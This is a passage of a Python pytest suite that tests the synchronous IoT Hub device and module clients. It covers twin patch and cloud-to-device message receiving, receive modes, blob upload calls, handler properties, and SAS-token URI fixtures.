id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False # twin patches will appear disabled
)
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin patches will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox.put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control of a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubDeviceClientCreateFromSastoken(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSastokenTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .shutdown()")
class TestIoTHubDeviceClientShutdown(IoTHubDeviceClientTestsConfig, SharedClientShutdownTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .update_sastoken()")
class TestIoTHubDeviceClientUpdateSasToken(
IoTHubDeviceClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
sas_config = IoTHubPipelineConfig(hostname=hostname, device_id=device_id, sastoken=sastoken)
return sas_config
@pytest.fixture
def sas_client(self, mqtt_pipeline, http_pipeline, sas_config):
"""Client configured as if using user-provided, non-renewable SAS auth"""
mqtt_pipeline.pipeline_configuration = sas_config
http_pipeline.pipeline_configuration = sas_config
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def uri(self, hostname, device_id):
return "{hostname}/devices/{device_id}".format(hostname=hostname, device_id=device_id)
@pytest.fixture(params=["Nonmatching Device ID", "Nonmatching Hostname"])
def nonmatching_uri(self, request, device_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
uri_format = "{hostname}/devices/{device_id}"
if request.param == "Nonmatching Device ID":
return uri_format.format(hostname=hostname, device_id="nonmatching_device")
else:
return uri_format.format(hostname="nonmatching_hostname", device_id=device_id)
@pytest.fixture(
params=["Too short", "Too long", "Incorrectly formatted device notation", "Module URI"]
)
def invalid_uri(self, request, device_id, hostname):
# NOTE: As in the nonmatching_uri fixture above, this is a workaround for parametrization
# that allows the usage of other fixtures in the parametrized value. Weird pattern, but
# necessary to ensure stability of the tests over time.
if request.param == "Too short":
# Doesn't have device ID
return hostname + "/devices"
elif request.param == "Too long":
# Extraneous value at the end
return "{}/devices/{}/somethingElse".format(hostname, device_id)
elif request.param == "Incorrectly formatted device notation":
# Doesn't have '/devices/'
return "{}/not-devices/{}".format(hostname, device_id)
else:
# Valid... for a Module... but this is a Device
return "{}/devices/{}/modules/my_module".format(hostname, device_id)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(
IoTHubDeviceClientTestsConfig, WaitsForEventCompletion
):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox.put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
IoTHubDeviceClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_storage_info_for_blob()")
class TestIoTHubDeviceClientGetStorageInfo(WaitsForEventCompletion, IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Begins a 'get_storage_info_for_blob' HTTPPipeline operation")
def test_calls_pipeline_get_storage_info_for_blob(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
@pytest.mark.it(
"Waits for the completion of the 'get_storage_info_for_blob' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
fake_blob_name = "__fake_blob_name__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"storage_info": "__fake_storage_info__"},
)
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
@pytest.mark.it(
"Raises a client error if the `get_storage_info_for_blob` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
fake_blob_name = "__fake_blob_name__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.get_storage_info_for_blob,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_storage_info_for_blob(fake_blob_name)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns a storage_info object upon successful completion")
def test_returns_storage_info(self, mocker, client, http_pipeline):
fake_blob_name = "__fake_blob_name__"
fake_storage_info = "__fake_storage_info__"
received_storage_info = client.get_storage_info_for_blob(fake_blob_name)
assert http_pipeline.get_storage_info_for_blob.call_count == 1
assert http_pipeline.get_storage_info_for_blob.call_args == mocker.call(
fake_blob_name, callback=mocker.ANY
)
assert (
received_storage_info is fake_storage_info
        ) # Note: the return value this is checking for is defined in client_fixtures.py
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .notify_blob_upload_status()")
class TestIoTHubDeviceClientNotifyBlobUploadStatus(
WaitsForEventCompletion, IoTHubDeviceClientTestsConfig
):
@pytest.mark.it("Begins a 'notify_blob_upload_status' HTTPPipeline operation")
def test_calls_pipeline_notify_blob_upload_status(self, client, http_pipeline):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
client.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
kwargs = http_pipeline.notify_blob_upload_status.call_args[1]
assert http_pipeline.notify_blob_upload_status.call_count == 1
assert kwargs["correlation_id"] is correlation_id
assert kwargs["is_success"] is is_success
assert kwargs["status_code"] is status_code
assert kwargs["status_description"] is status_description
@pytest.mark.it(
"Waits for the completion of the 'notify_blob_upload_status' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
self.add_event_completion_checks(
mocker=mocker, pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status
)
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
@pytest.mark.it(
"Raises a client error if the `notify_blob_upload_status` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(
pipeline_exceptions.OperationCancelled,
client_exceptions.OperationCancelled,
id="OperationCancelled -> OperationCancelled",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
correlation_id = "__fake_correlation_id__"
is_success = "__fake_is_success__"
status_code = "__fake_status_code__"
status_description = "__fake_status_description__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.notify_blob_upload_status,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.notify_blob_upload_status(
correlation_id, is_success, status_code, status_description
)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubDeviceClientPROPERTYOnMessageReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.C2D_MSG
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubDeviceClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubDeviceClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubDeviceClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYReceiverHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_connection_state_change")
class TestIoTHubDeviceClientPROPERTYOnConnectionStateChangeHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_connection_state_change"
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .on_new_sastoken_required")
class TestIoTHubDeviceClientPROPERTYOnNewSastokenRequiredHandler(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_new_sastoken_required"
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - PROPERTY .connected")
class TestIoTHubDeviceClientPROPERTYConnected(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: Connect")
class TestIoTHubDeviceClientOCCURRENCEConnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCEConnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: Disconnect")
class TestIoTHubDeviceClientOCCURRENCEDisconnect(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCEDisconnectTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - OCCURRENCE: New Sastoken Required")
class TestIoTHubDeviceClientOCCURRENCENewSastokenRequired(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientOCCURRENCENewSastokenRequired
):
pass
################
# MODULE TESTS #
################
class IoTHubModuleClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubModuleClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubModuleClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
        It should only be used for tests where manual control of a callback is required.
"""
return IoTHubModuleClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, module_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return module_connection_string
@pytest.fixture
def sas_token_string(self, module_sas_token_string):
return module_sas_token_string
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - Instantiation")
class TestIoTHubModuleClientInstantiation(
IoTHubModuleClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_input_message_received handler in the MQTTPipeline")
def test_sets_on_input_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_input_message_received is not None
assert (
client._mqtt_pipeline.on_input_message_received
== client._inbox_manager.route_input_message
)
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubModuleClientCreateFromConnectionString(
IoTHubModuleClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_sastoken()")
class TestIoTHubModuleClientCreateFromSastoken(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromSastokenTests
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Container Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests,
):
pass
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - .create_from_edge_environment() -- Edge Local Debug Environment"
)
class TestIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnv(
IoTHubModuleClientTestsConfig,
SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests,
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubModuleClientCreateFromX509Certificate(
IoTHubModuleClientTestsConfig, SharedIoTHubModuleClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .shutdown()")
class TestIoTHubModuleClientShutdown(IoTHubModuleClientTestsConfig, SharedClientShutdownTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .update_sastoken()")
class TestIoTHubModuleClientUpdateSasToken(
IoTHubModuleClientTestsConfig, SharedClientUpdateSasTokenTests
):
@pytest.fixture
def module_id(self, sas_token_string):
# NOTE: This is kind of unconventional, but this is the easiest way to extract the
# module id from a sastoken string
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
module_id = token_uri_pieces[4]
return module_id
@pytest.fixture
def sas_config(self, sas_token_string):
"""PipelineConfig set up as if using user-provided, non-renewable SAS auth"""
sastoken = st.NonRenewableSasToken(sas_token_string)
token_uri_pieces = sastoken.resource_uri.split("/")
hostname = token_uri_pieces[0]
device_id = token_uri_pieces[2]
module_id = token_uri_pieces[4]
sas_config = IoTHubPipelineConfig(
hostname=hostname, device_id=device_id, module_id=module_id, sastoken=sastoken
)
return sas_config
@pytest.fixture
def uri(self, hostname, device_id, module_id):
return "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=hostname, device_id=device_id, module_id=module_id
)
@pytest.fixture(
params=["Nonmatching Device ID", "Nonmatching Module ID", "Nonmatching Hostname"]
)
def nonmatching_uri(self, request, device_id, module_id, hostname):
# NOTE: It would be preferable to have this as a parametrization on a test rather than a
# fixture, however, we need to use the device_id and hostname fixtures in order to ensure
# tests don't break when other fixtures change, and you can't include fixtures in a
# parametrization, so this also has to be a fixture
